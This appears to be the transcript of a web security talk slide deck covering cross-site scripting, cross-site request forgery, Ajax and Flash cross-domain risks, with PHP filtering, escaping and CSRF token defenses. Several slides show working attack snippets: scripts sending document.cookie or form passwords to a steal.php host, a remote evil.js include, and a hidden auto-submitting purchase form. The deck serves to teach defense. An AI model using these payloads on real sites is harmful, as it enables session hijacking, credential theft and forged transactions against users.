Security 2.0
Chris Shiflett, Principal, OmniTI
chris@omniti.com

Talk Outline
‣ What Is Web 2.0?
‣ Cross-Site Scripting
‣ Cross-Site Request Forgeries
‣ Attack Mashups
‣ Live Demo?
‣ Questions and Answers

What Is Web 2.0?

Web 1.0                   Web 2.0
DoubleClick               Google AdSense
Ofoto                     Flickr
Britannica Online         Wikipedia
Personal Web Sites        Blogs
Screen Scraping           Web Services
Directories (Taxonomy)    Tagging (Folksonomy)

Cross-Site Scripting

[Diagram: the three parties in an XSS attack: Attacker, Target, Victim]

Cross-Site Scripting

[Diagram: Attacker sends XSS to Target; Target serves HTML containing the XSS to Victim]

Cross-Site Scripting

echo $_GET['user'];

http://host/script.php?user=%3Cscript%3E...

echo '<script>...';


Stealing Cookies

<script>
document.location = 'http://host/steal.php?cookies=' + encodeURI(document.cookie);
</script>


Stealing Passwords

<script>
document.forms[0].action = 'http://host/steal.php';
</script>


Stealing Saved Passwords

<form name="steal" action="http://host/steal.php">
<input type="text" name="username" style="display: none" />
<input type="password" name="password" style="display: none" />
<input type="image" src="image.png" />
</form>


Keeping It Short

<script src="http://host/evil.js"></script>


Character Encoding Consistency

<?php
header('Content-Type: text/html; charset=UTF-7');
$string = "<script>alert('XSS');</script>";
/* In UTF-7, < and > become +ADw- and +AD4-, which htmlentities() leaves untouched;
   the browser, told the page is UTF-7, decodes them back into markup */
$string = mb_convert_encoding($string, 'UTF-7');
echo htmlentities($string);
?>


FIEO (Filter Input, Escape Output)

[Diagram: within PHP, input passes through FILTER, then BUSINESS LOGIC, then ESCAPE before output]


<?php
$clean = array();
if (preg_match('/^\d{5}$/', $_POST['zip'])) {
    $clean['zip'] = $_POST['zip'];
} else {
    /* Error */
}
?>


<?php
/* Content-Type: text/html; charset=UTF-8 */
$html = array();
$html['user'] = htmlentities($clean['user'], ENT_QUOTES, 'UTF-8');
echo "<p>Welcome, {$html['user']}.</p>";
?>


Escaping

echo htmlentities('<script>', ENT_QUOTES, 'UTF-8');

Output (HTML source):
&lt;script&gt;

Rendered by the browser as text, not markup:
<script>


Cross-Site Request Forgeries

[Diagram: the CSRF attack travels from the Victim to the Target]


CSRF

<form action="buy.php" method="POST">
<input type="hidden" name="isbn" value="059600656X" />
<input type="submit" value="BUY" />
</form>

[Rendered: a BUY button]


CSRF

<img src="http://host/buy.php?isbn=059600656X" />

GET /buy.php?isbn=059600656X HTTP/1.1
Host: host
Cookie: PHPSESSID=1234


CSRF

<iframe style="visibility: hidden" name="secret"></iframe>
<form name="buy" action="http://host/buy.php" method="POST" target="secret">
<input type="hidden" name="isbn" value="059600656X" />
</form>
<script type="text/javascript">document.buy.submit();</script>

POST /buy.php HTTP/1.1
Host: host
Cookie: PHPSESSID=1234
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

isbn=059600656X


Stealing Cookies

<script>
new Image().src = 'http://host/steal.php?cookies=' + encodeURI(document.cookie);
</script>


One-Time Tokens

$token = md5(uniqid(rand(), TRUE));
$_SESSION['token'] = $token;
$html['token'] = htmlentities($token, ENT_QUOTES, 'UTF-8');

<input type="hidden" name="token" value="<?php echo $html['token']; ?>" />

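As an added example, not from the slides, here is the receiving side that the token slide leaves out: buy.php issues the token with the form and refuses a purchase unless the submitted token matches the one in the session. The buy.php layout, the ISBN-10 check and the use of random_bytes() and hash_equals() are my assumptions.

```php
<?php
// Added example, not from the slides: issue a CSRF token with the form and
// verify it in buy.php before the purchase is processed.
session_start();

// Issue a fresh token and remember it in the session.
function issue_token(): string {
    // The slides use md5(uniqid(rand(), TRUE)); random_bytes() (PHP 7+) is assumed here.
    $token = bin2hex(random_bytes(32));
    $_SESSION['token'] = $token;
    return $token;
}

// Compare the submitted token with the stored one in constant time.
function token_is_valid(array $post): bool {
    if (!isset($_SESSION['token'], $post['token']) || !is_string($post['token'])) {
        return false;
    }
    return hash_equals($_SESSION['token'], $post['token']);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Filter input: ISBN-10 shape (assumed check), then the token.
    $clean = array();
    if (isset($_POST['isbn']) && preg_match('/^\d{9}[\dX]$/', $_POST['isbn'])) {
        $clean['isbn'] = $_POST['isbn'];
    } else {
        http_response_code(400);
        exit('Invalid ISBN.');
    }
    if (!token_is_valid($_POST)) {
        http_response_code(403);
        exit('Missing or invalid token.');
    }
    unset($_SESSION['token']); // one-time: the token is good for exactly one purchase
    /* ... process the purchase of $clean['isbn'] here ... */
    exit('Purchased ' . htmlentities($clean['isbn'], ENT_QUOTES, 'UTF-8'));
}

// GET: render the form; escape output before it goes into HTML.
$html = array();
$html['token'] = htmlentities(issue_token(), ENT_QUOTES, 'UTF-8');
?>
<form action="buy.php" method="POST">
<input type="hidden" name="token" value="<?php echo $html['token']; ?>" />
<input type="hidden" name="isbn" value="059600656X" />
<input type="submit" value="BUY" />
</form>
```

This check stops a forged request from another site, but, as the XSS + Ajax + CSRF slide shows, it does not stop a script already running on the target's own origin, which can fetch the form and read the token.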

Ajax

"The name is shorthand for Asynchronous JavaScript + XML, and it represents a fundamental shift in what's possible on the Web."
Jesse James Garrett, adaptivepath.com


Ajax

‣ Ajax has sparked a renewed interest in JavaScript.
‣ Most XSS attacks utilize JavaScript.


Ajax

‣ XSS + Ajax avoids the JavaScript security sandbox.
‣ This has catastrophic consequences.
‣ It's also why cross-domain Ajax would be dangerous.


XSS + Ajax + CSRF

[Diagram: XSS running in the Victim's browser sends an XMLHttpRequest to the Target, receives the HTML form containing the Victim's token, then sends a second XMLHttpRequest to the Target carrying the Victim's token]


Cross-Domain Ajax

‣ There are several ways to send cross-domain Ajax requests.
‣ Most do not avoid the JavaScript security sandbox, but instead work around it.
‣ But, true cross-domain Ajax is possible with Flash.


Cross-Domain Ajax

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>


Cross-Domain Ajax with Flash

"Why should I care about Flash? We don't use Flash."

‣ The browsers that your users use are Flash-capable.
‣ Some of the most dangerous emerging risks are those that target your users.
‣ Your users become not only victims, but also accomplices.


More Information

‣ http://shiflett.org/
‣ http://omniti.com/
‣ http://phpsec.org/
‣ http://phpsecurity.org/